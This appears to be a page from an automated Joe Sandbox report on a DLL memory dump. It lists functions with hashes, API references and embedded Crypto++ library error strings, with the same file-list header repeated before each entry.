Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: doesn't match the required length of $ for this key$: ciphertext length of
API String ID: 1025790555-2559040249
Opcode ID: 8fee05a25fea35d0e2ec4bd09579531b1bd8eda5eb5c1c0f49c7ca81e900e530
Instruction ID: 1a9dea88c48bfa0a9e790de5688e301dd2da33c3373f5080075c31ebf1c93da6
Opcode Fuzzy Hash: 8fee05a25fea35d0e2ec4bd09579531b1bd8eda5eb5c1c0f49c7ca81e900e530
Instruction Fuzzy Hash: BAA1407150C3809FE324DB69D890B9BB7E9AFD9304F054A1DE19D87351DB70A905CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D0931D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 213COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D0932BC
_memmove.LIBCMT ref: 6D0932D0

Strings

i7m, xrefs: 6D09322C, 6D093274, 6D093340
i7m, xrefs: 6D0931DB, 6D09320B, 6D093253, 6D093285, 6D093346

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _malloc_memmove
String ID: i7m$i7m
API String ID: 1183979061-163136662
Opcode ID: f5258de96050c933a64b898dc1cb4b74fe6868d1e8ec941d9f318476e99be401
Instruction ID: 61572f95bb9e0291ff2aaac5d44deaaa5d7e885c412cf2eb082dc0dc70dea5c0
Opcode Fuzzy Hash: f5258de96050c933a64b898dc1cb4b74fe6868d1e8ec941d9f318476e99be401
Instruction Fuzzy Hash: 18815971A042059FEB04CF58C480BAEBBF1BB49314F15D1A9E82DAF661DB70E985DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D0CB47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6D0CB50D

Part of subcall function 6D0D1AA0: __87except.LIBCMT ref: 6D0D1ADB

Strings

pow, xrefs: 6D0CB4E5, 6D0CB502

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: ff640b48b5e5a5ea4ef55e809c772acb178690d51a5c0c1d812cbf54ebb48223
Instruction ID: 6369e2b7ac7ecafeaefceef3a8744cb2cc94f07291993e28ee7eab5dc05de6d8
Opcode Fuzzy Hash: ff640b48b5e5a5ea4ef55e809c772acb178690d51a5c0c1d812cbf54ebb48223
Instruction Fuzzy Hash: 3E515B60E1C30386F742AB18C94037E7BF4EB81764F60CD5AE4E583198EF3588D48A57

Uniqueness

Uniqueness Score: -1.00%

Function 6D078560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6D0788ED

Part of subcall function 6D0CA116: __mbstowcs_s_l.LIBCMT ref: 6D0CA12C

__cftoe.LIBCMT ref: 6D078911

Strings

P, xrefs: 6D078841
zX, xrefs: 6D07865E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: __cftoe$__mbstowcs_s_l
String ID: zX$P
API String ID: 1494777130-2079734279
Opcode ID: 3e0020156f2e83ef633cb3af6df1d32180b83a27b2d1be56e25fa1f0bc5501be
Instruction ID: 106883b36548fd9f5fdff98101bfdf5f8442c44a87f3c541ba91d6b5d8bf3956
Opcode Fuzzy Hash: 3e0020156f2e83ef633cb3af6df1d32180b83a27b2d1be56e25fa1f0bc5501be
Instruction Fuzzy Hash: A391F0B11087819FD376DF15C880BABBBE8FB88714F504A1DE59D8B280EB716645CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6D0989D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6D098ABB
__CxxThrowException@8.LIBCMT ref: 6D098B82

Strings

PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6D098A8E
: invalid ciphertext, xrefs: 6D098B48

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw
String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
API String ID: 2005118841-483996327
Opcode ID: 26a20c9e560066eb7ab78afe55202126c7f8384a3bac47f2ffb3ee27a3e2ff36
Instruction ID: 38bb31b7f094832a50f556c5403e50da82cf61e8ffe9c56416de2864ec96d843
Opcode Fuzzy Hash: 26a20c9e560066eb7ab78afe55202126c7f8384a3bac47f2ffb3ee27a3e2ff36
Instruction Fuzzy Hash: 0D511BB51087419FE324CF64D990FABB7E8AB88704F104A1DE59A87751DB31E909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D096B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D096BA6

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D064067
Part of subcall function 6D064010: _memmove.LIBCMT ref: 6D0640C8

__CxxThrowException@8.LIBCMT ref: 6D096C56

Strings

RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6D096BE3
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6D096B33

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
API String ID: 1902190269-184618050
Opcode ID: c4cc3cf4e169f4499a49dfbe6a1a4372db0a04d9bac7c720f2b4ba9e64d4c66d
Instruction ID: 3b6a1dfca1bfcb6cfad392175f28440d4c2a41eec0a2c3a8d62e6d87f74991f7
Opcode Fuzzy Hash: c4cc3cf4e169f4499a49dfbe6a1a4372db0a04d9bac7c720f2b4ba9e64d4c66d
Instruction Fuzzy Hash: 075105B110C380AFE300DF69D880B5BFBE8BB99754F504A1EF59587291DBB4D548CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D064E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D064EFC
std::_Xinvalid_argument.LIBCPMT ref: 6D064F16
_memmove.LIBCMT ref: 6D064F6C

Part of subcall function 6D064D90: std::_Xinvalid_argument.LIBCPMT ref: 6D064DA9
Part of subcall function 6D064D90: std::_Xinvalid_argument.LIBCPMT ref: 6D064DCA
Part of subcall function 6D064D90: std::_Xinvalid_argument.LIBCPMT ref: 6D064DE5
Part of subcall function 6D064D90: _memmove.LIBCMT ref: 6D064E4D

Strings

string too long, xrefs: 6D064EF7, 6D064F11

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: c8c9d9477c94ce7c554024b889be4302d4773671afe5e64422c7bbd3d47b4ca3
Instruction ID: c8e09e339b081698e99d7854fb90ae65bf7b9213e29539959d1ebcaafd696f90
Opcode Fuzzy Hash: c8c9d9477c94ce7c554024b889be4302d4773671afe5e64422c7bbd3d47b4ca3
Instruction Fuzzy Hash: 4D3129323186906FF3249E6DE4A0B6EF7E9EFD9620720492FE15587681C771D84083B1

Uniqueness

Uniqueness Score: -1.00%

Function 6D062090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D06211F

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D064067
Part of subcall function 6D064010: _memmove.LIBCMT ref: 6D0640C8

__CxxThrowException@8.LIBCMT ref: 6D0621BF

Strings

PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6D06215D
PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6D0620BD

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
API String ID: 1902190269-1268710280
Opcode ID: 7796b9678367e6e6cc1069be3b50fa0b606647757f041bf8eea5b86e9ca11ac4
Instruction ID: 4740c9ac26a645049be4e1f173345aa7d45b02c593dfabb5c37d92ee77a580e8
Opcode Fuzzy Hash: 7796b9678367e6e6cc1069be3b50fa0b606647757f041bf8eea5b86e9ca11ac4
Instruction Fuzzy Hash: 40413D70C0428CBEEB04DFE8D890BEEFBB8AB19354F50425EE521A7291DB745608CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6D061D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D061DC9

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D064067
Part of subcall function 6D064010: _memmove.LIBCMT ref: 6D0640C8

__CxxThrowException@8.LIBCMT ref: 6D061E74

Strings

CryptoMaterial: this object contains invalid values, xrefs: 6D061E16
BufferedTransformation: this object is not attachable, xrefs: 6D061D67

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
API String ID: 1902190269-3853263434
Opcode ID: 7eaaf0c9773712d49e5cd77a2e52c09eb548b729da42bb1a9a52ff3fd082ed80
Instruction ID: 8d67a19857dcc36b6d0f0521928790ef50931b3d65a9ecbb8b773984a9da7e35
Opcode Fuzzy Hash: 7eaaf0c9773712d49e5cd77a2e52c09eb548b729da42bb1a9a52ff3fd082ed80
Instruction Fuzzy Hash: 89413F70C04288AFEB14DFE8D890BDEFBB8FF09354F10825AE525A7291DB745604CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6D0974C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6D0BD820: _memmove.LIBCMT ref: 6D0BD930

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D09761A

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Strings

HashTransformation: can't truncate a , xrefs: 6D097552
byte digest to , xrefs: 6D097565
bytes, xrefs: 6D097594

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: byte digest to $ bytes$HashTransformation: can't truncate a
API String ID: 39012651-1139078987
Opcode ID: 502b5f4acfb995d74b55d71e9974fbe3a20a96af742e95feedff64345fceccf1
Instruction ID: 8ce65b32924dc30d4ec047c910d251b6035281687b69b4757d84351d97399071
Opcode Fuzzy Hash: 502b5f4acfb995d74b55d71e9974fbe3a20a96af742e95feedff64345fceccf1
Instruction Fuzzy Hash: D7415E7110C3C0AEE320CB54D844F9FBBE8ABD9358F154A1DE29997281DB7591048BA7

Uniqueness

Uniqueness Score: -1.00%

Function 6D09BEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D09BF2D

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

Strings

gfff, xrefs: 6D09BF37
vector<T> too long, xrefs: 6D09BF28
gfff, xrefs: 6D09BF80

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: e2ca38d9c7c54c1ce2125010f430bef5f1f54f984288fe410334d37dd03c5e75
Instruction ID: 67f4b52ab92ee35ad55296fe0f45e15bcb41f1d772d6e6229f037d8494965d9e
Opcode Fuzzy Hash: e2ca38d9c7c54c1ce2125010f430bef5f1f54f984288fe410334d37dd03c5e75
Instruction Fuzzy Hash: 8131B6B1A046099FD718CF5AD9D0F6AF7E9FB88714F10862DE9599B380DB30B900CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C8F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(400BD10B,400BD10B,?,00000000), ref: 6D0C8F7F
GetLastError.KERNEL32(0000000A,?,00000000), ref: 6D0C8F8F

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D0C9014

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Strings

Timer: QueryPerformanceCounter failed with error , xrefs: 6D0C8FA5

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceCounter failed with error
API String ID: 1823523280-4075696077
Opcode ID: 483f0c604798f46322aafa4d43cdb961e0fca15923a024f8eaff6db3702f8dc3
Instruction ID: 11ee5fa5e1f8efcb4208678e7de03aa568348603474a17ebef5aa1a822caedeb
Opcode Fuzzy Hash: 483f0c604798f46322aafa4d43cdb961e0fca15923a024f8eaff6db3702f8dc3
Instruction Fuzzy Hash: 38211BB150C780AFE310DF24D884B9FBBE8FB89658F504A1DF5A987281DB75D5048BA3

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C8E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(400BD10B,400BD10B), ref: 6D0C8E7F
GetLastError.KERNEL32(0000000A), ref: 6D0C8E8F

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D0C8F14

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Strings

Timer: QueryPerformanceFrequency failed with error , xrefs: 6D0C8EA5

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

